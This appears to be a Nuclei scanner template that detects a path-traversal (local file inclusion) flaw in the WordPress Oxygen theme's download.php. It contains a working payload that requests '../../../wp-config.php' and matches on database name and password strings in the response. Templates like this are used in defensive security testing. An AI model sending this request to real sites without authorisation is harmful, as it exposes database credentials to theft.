id: wp-oxygen-theme-lfi

info:
  name: WordPress Oxygen-Theme - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: WordPress Oxygen-Theme has a local file inclusion vulnerability via the 'file' parameter of 'download.php'.
  reference:
    - https://cxsecurity.com/issue/WLB-2019030178
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: wordpress,wp-theme,lfi

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/themes/oxygen-theme/download.php?file=../../../wp-config.php'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        part: body
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502206c42af77b0c7990a8ccc0841428390468d7ccba6530cb949ceac54971366e227022100f7f7d8f8572a5d9899991c9349b640f36a599884af92846e0d533cd5ca90f293:922c64590222798bb761d5b6d8e72950